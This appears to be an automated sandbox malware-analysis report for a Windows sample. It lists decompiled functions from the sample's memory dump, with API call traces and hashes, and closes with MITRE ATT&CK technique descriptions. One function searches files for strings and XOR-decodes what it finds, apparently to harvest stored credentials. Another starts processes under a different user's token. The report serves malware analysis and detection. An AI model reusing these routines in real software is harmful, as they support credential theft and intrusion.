Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: 850554409c3d28c982c778a6f09d2be731c80e04231c914af887486a67ee691f
Instruction ID: 35eee9bc70af7ea577d04fbb3a676726587c29851ed08c152dde8d778c712c19
Opcode Fuzzy Hash: 850554409c3d28c982c778a6f09d2be731c80e04231c914af887486a67ee691f
Instruction Fuzzy Hash: AF01267110021876DE206B24CC06FEF3B6ADB82354F104233FE66B61F1C2799EC6969D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD96, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD96(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041151D( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E0040C341(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E0040C1FE(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x0040fdaa
0x0040fdc0
0x0040fdda
0x0040fde0
0x0040fdf4
0x0040fe01
0x0040fe08
0x0040fe0c
0x0040fe0d
0x0040fe12

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040FDB8

Part of subcall function 0041151D: SetFileAttributesW.KERNEL32(00000080,00000080,00404F4A,?), ref: 00411526
Part of subcall function 0041151D: DeleteFileW.KERNEL32(?), ref: 00411530

PathFindFileNameW.SHLWAPI(?,?,?), ref: 0040FDDA

Part of subcall function 0040C341: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040D039,00000000,00000000,00000000,0040C39E,00000000,00000000,00000000,?,00000000), ref: 0040C35C

Strings

cab, xrefs: 0040FDAD

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: 74598aed3270a28b5a62dca0061675d265f38a07a9939cf1d4a270c5455f0110
Instruction ID: f6c5817c92eb3cb91a997eb5ad52e3afb35a880178f98fd193186e8a15de47a4
Opcode Fuzzy Hash: 74598aed3270a28b5a62dca0061675d265f38a07a9939cf1d4a270c5455f0110
Instruction Fuzzy Hash: FF01A77260021477CB209B69CC49F8B77AC9F45764F0047757D25F32D2D674EA488AE4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B07E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040B07E(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E0040F8B1(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E0040CF30( &_a4, L"\"%s\"", _a16) > 0) {
								E0040DAE4(_t27, _a4);
								E0040C1C2(_a4);
							}
						}
						E0040C1C2(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x0040b088
0x0040b08d
0x0040b098
0x0040b09c
0x0040b0ab
0x0040b0b1
0x0040b0c7
0x0040b0cd
0x0040b0d5
0x0040b0d5
0x0040b0da
0x0040b0dc
0x0040b0dc
0x00000000
0x0040b0ea
0x0040b0ec

APIs

Part of subcall function 0040F8B1: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,0040D7FB,?,?,?,00412F92,000000FF,004238B0), ref: 0040F8CA
Part of subcall function 0040F8B1: GetLastError.KERNEL32(?,?,0040D7FB,?,?,?,00412F92,000000FF,004238B0,?,?,00000000), ref: 0040F8D0
Part of subcall function 0040F8B1: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0040D7FB,?,?,?,00412F92,000000FF,004238B0), ref: 0040F8F6

EqualSid.ADVAPI32(00000000,0000000C,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0A3

Part of subcall function 0040DAE4: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 0040DAF5
Part of subcall function 0040DAE4: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040DB14
Part of subcall function 0040DAE4: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040DB20
Part of subcall function 0040DAE4: CreateProcessAsUserW.ADVAPI32(?,00000000,0040B0D2,00000000,00000000,00000000,0040B0D2,0040B0D2,00000000,?,?,?,00000000,00000044), ref: 0040DB91
Part of subcall function 0040DAE4: CloseHandle.KERNEL32(?), ref: 0040DBA4
Part of subcall function 0040DAE4: CloseHandle.KERNEL32(?), ref: 0040DBA9
Part of subcall function 0040DAE4: FreeLibrary.KERNEL32(?), ref: 0040DBC0

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

CloseHandle.KERNEL32(?,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0E4

Strings

"%s", xrefs: 0040B0B7

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: 8b5be02412ebe7e020a9184c5dbb9d8bf6b17f147aa32a717a31295769b8c990
Instruction ID: a90065773485ca39b45e4dec26d4fcff7d62d8b4c296a90a9959f676471db286
Opcode Fuzzy Hash: 8b5be02412ebe7e020a9184c5dbb9d8bf6b17f147aa32a717a31295769b8c990
Instruction Fuzzy Hash: C9F01D36100109BBCF116F61DC45ADF3B69EF44355B048136FC18B91A1DB39CA60DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E28B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E28B(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E0040E20A();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E0040E0D8( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E0040C1C2(_v44);
				return _t26;
			}

0x0040e293
0x0040e296
0x0040e29c
0x0040e29f
0x0040e2ad
0x0040e2b0
0x0040e2b7
0x0040e2ba
0x0040e2bd
0x0040e2c0
0x0040e2c3
0x0040e2c6
0x0040e2cd
0x0040e2d6
0x0040e2e0
0x0040e2e6
0x0040e2e6
0x0040e2ec
0x0040e2f7

APIs

Part of subcall function 0040E20A: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040E21B
Part of subcall function 0040E20A: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040E22E
Part of subcall function 0040E20A: FreeLibrary.KERNEL32(?), ref: 0040E280

GetTickCount.KERNEL32 ref: 0040E2D0

Part of subcall function 0040E0D8: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0040E12C
Part of subcall function 0040E0D8: InternetCloseHandle.WININET(00000000), ref: 0040E1C5

GetTickCount.KERNEL32 ref: 0040E2E2

Strings

http://www.google.com/webhp, xrefs: 0040E2B0

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: fd558edd8ca79384bb39ad1235537ea1e85c49bd8fbbe7aaf9dd8e24d3f0314f
Instruction ID: 98079edd6fece2fa1c4e826471535ca806014ba1bd791a286b2bc2fcded5e74d
Opcode Fuzzy Hash: fd558edd8ca79384bb39ad1235537ea1e85c49bd8fbbe7aaf9dd8e24d3f0314f
Instruction Fuzzy Hash: E301A8B1D112289ACF00EFEAD9854DEFBB8EF48758F10456BE800B7251D3B45A058FE9

Uniqueness

Uniqueness Score: -1.00%

Function 004114F6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(c A,c A,?,?,?,00412063,00000000), ref: 00411502

Strings

c A, xrefs: 004114FB, 004114FE
c A, xrefs: 004114FF

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: FileSize
String ID: c A$c A
API String ID: 3433856609-3029591421
Opcode ID: 935f1b20553e8c3b9bc8dfc9f493cc9ba07646f50b2327c7323d49c4f643c1c2
Instruction ID: 07554132ac8ec1690528f1cf5fbcf705285203e363a8ac323c6a2869270e0c33
Opcode Fuzzy Hash: 935f1b20553e8c3b9bc8dfc9f493cc9ba07646f50b2327c7323d49c4f643c1c2
Instruction Fuzzy Hash: 8DD05E7560010CBBAB05CB59CC05CDE7BBEAB80364B108265B512922A0E370EE819A68

Uniqueness

Uniqueness Score: -1.00%

Function 00419B82, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00419B82(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E00411A47( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E004113D7(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E0040CA5D(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0041147F( &_v612);
						goto L31;
					}
					_v640 = E0040C192(0x622);
					E004128A5(0x91,  &_v588);
					E004128A5(0x92,  &_v628);
					E004128A5(0x93,  &_v620);
					E004128A5(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E0040C1C2(_v640);
						E0040C1DE(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E00419B68();
							E00419B68();
							E00419B68();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E004128DB(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E0040CEB5(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E0040C5B6(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E00419B68();
							_t157 = E0040C841(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E004128DB(0x90, _t171);
					_v648 = _t171;
					E004118EB( &_v524,  &_v648, _t177, 1, 5, E00419B82, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x00419b88
0x00419ba6
0x00419e06
0x00419e0e
0x00419e0e
0x00419bac
0x00419baf
0x00419bf2
0x00419bf5
0x00419bfa
0x00419bff
0x00419c01
0x00000000
0x00000000
0x00419c18
0x00419c1d
0x00419c21
0x00419c24
0x00419dfd
0x00419e01
0x00000000
0x00419e01
0x00419c34
0x00419c41
0x00419c4f
0x00419c5d
0x00419c6b
0x00419c70
0x00419c74
0x00419de7
0x00419deb
0x00419df8
0x00000000
0x00419df8
0x00419c7a
0x00419c7e
0x00419c82
0x00419c8e
0x00419c8e
0x00419c92
0x00419c96
0x00419c9a
0x00000000
0x00000000
0x00419caa
0x00419cbc
0x00419ccc
0x00419cdc
0x00419cde
0x00419ce3
0x00419ce5
0x00000000
0x00000000
0x00419ceb
0x00419cf0
0x00000000
0x00000000
0x00419cf6
0x00419cf8
0x00000000
0x00000000
0x00419cfe
0x00419d07
0x00419d0c
0x00419d0f
0x00419d13
0x00419d1c
0x00419d23
0x00419d28
0x00419d2a
0x00419d54
0x00419d56
0x00419d57
0x00419d5b
0x00419d5e
0x00000000
0x00000000
0x00419d64
0x00419d67
0x00000000
0x00000000
0x00419d69
0x00419d6b
0x00419d6d
0x00000000
0x00000000
0x00419d6f
0x00419d71
0x00419d77
0x00419d77
0x00419d7b
0x00000000
0x00000000
0x00419d7d
0x00419d7d
0x00419d7f
0x00419d81
0x00000000
0x00000000
0x00000000
0x00000000
0x00419d83
0x00419d83
0x00419d83
0x00419d87
0x00419d88
0x00419d88
0x00419d8e
0x00419d90
0x00419d94
0x00419d98
0x00419d99
0x00419d9e
0x00419d9f
0x00419da3
0x00419da7
0x00419dad
0x00419db7
0x00419dbc
0x00419dbf
0x00419dc1
0x00419dc3
0x00419dc9
0x00419dce
0x00419dd0
0x00419dd2
0x00419dd2
0x00419dd2
0x00419dd2
0x00419dd0
0x00419dc1
0x00000000
0x00419d90
0x00419d73
0x00419d75
0x00000000
0x00000000
0x00000000
0x00419d75
0x00419d31
0x00419d35
0x00419d45
0x00419d47
0x00419d4a
0x00000000
0x00000000
0x00419d4c
0x00419d52
0x00000000
0x00000000
0x00000000
0x00419dd5
0x00419dd5
0x00419ddd
0x00419ddd
0x00419c8e
0x00000000
0x00419bb1
0x00419bb1
0x00419bba
0x00419bc1
0x00419be1
0x00000000
0x00419be1

APIs

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 00419CA8
StrStrIA.SHLWAPI(?,?), ref: 00419CBA
StrStrIA.SHLWAPI(?,?), ref: 00419CCA
StrStrIA.SHLWAPI(?,?), ref: 00419CDC

Part of subcall function 004118EB: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
Part of subcall function 004118EB: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
Part of subcall function 004118EB: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
Part of subcall function 004118EB: Sleep.KERNEL32(00000000,?,?), ref: 004119F8
Part of subcall function 004118EB: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
Part of subcall function 004118EB: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: dd2c59ebd71306c572155ef6f10906c76fcf95d770ad236024411802279dd860
Instruction ID: 9f4d4553a39ce0701a27e46dc92aa61c4821babf1040abc4b15b35ef7126e2c0
Opcode Fuzzy Hash: dd2c59ebd71306c572155ef6f10906c76fcf95d770ad236024411802279dd860
Instruction Fuzzy Hash: 9471D1315083419FD720EF29D841ADFB7E5AF88714F440A1EF498A72A2D738DD86CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409E2F, Relevance: 5.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409E2F(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed int _t19;
				signed short _t26;
				signed int _t30;
				void* _t37;

				_t37 = E0040CD11(_a4);
				if(_t37 > 0x3e8) {
					EnterCriticalSection(0x422988);
					E0040C1C2( *0x42297c);
					 *0x42297c =  *0x42297c & 0x00000000;
					 *0x422984 = 0;
					LeaveCriticalSection(0x422988);
					return 0;
				}
				EnterCriticalSection(0x422988);
				_t26 = ( *0x422984 & 0x0000ffff) + _t37;
				if(_t26 <= 0x3e8) {
					_t13 = E0040C14D(_t26 + _t26, 0x42297c);
					if(_t13 != 0) {
						_t30 =  *0x42297c; // 0x0
						_t13 = E0040C1FE(_t30 + ( *0x422984 & 0x0000ffff) * 2, _a4, _t37 + _t37);
						 *0x422984 = _t26;
					}
				} else {
					_t13 = E0040C14D(0x7d0, 0x42297c);
					if(_t13 != 0) {
						_t18 = 0x3e8 - _t37;
						_t19 =  *0x42297c; // 0x0
						E0040C1FE(_t19, _t19 + (( *0x422984 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
						_t13 = E0040C1FE(0x3e8 - _t37 + _t18 +  *0x42297c, _v8, _t37 + _t37);
						 *0x422984 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x422988);
				return _t13;
			}

0x00409e3b
0x00409e44
0x00409e4c
0x00409e58
0x00409e5d
0x00409e67
0x00409e6d
0x00000000
0x00409e6d
0x00409e7e
0x00409e8b
0x00409e94
0x00409ee4
0x00409eeb
0x00409eed
0x00409f06
0x00409f0b
0x00409f0b
0x00409e96
0x00409e9b
0x00409ea2
0x00409ead
0x00409eb4
0x00409ebf
0x00409ed3
0x00409ed8
0x00409ed8
0x00409ea2
0x00409f17
0x00000000

APIs

EnterCriticalSection.KERNEL32(00422988,?,?,?,0040A122,?), ref: 00409E4C

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

LeaveCriticalSection.KERNEL32(00422988,?,?,?,0040A122,?), ref: 00409E6D
EnterCriticalSection.KERNEL32(00422988,?,?,?,?,0040A122,?), ref: 00409E7E
LeaveCriticalSection.KERNEL32(00422988,?,?,?,0040A122,?), ref: 00409F17

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: f7461d231d4e5d7b77a163a21d17db0db8f6c6dbe6d802cddd775a2eb052a579
Instruction ID: ed9fe413805121567e921b954cfbadebe557b0c43dd790c97f33963efacdd76c
Opcode Fuzzy Hash: f7461d231d4e5d7b77a163a21d17db0db8f6c6dbe6d802cddd775a2eb052a579
Instruction Fuzzy Hash: B821C5B1301106FBC720AFA4EE8497A7369AF85304F44417BF401A71B2DBB84846EF5E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

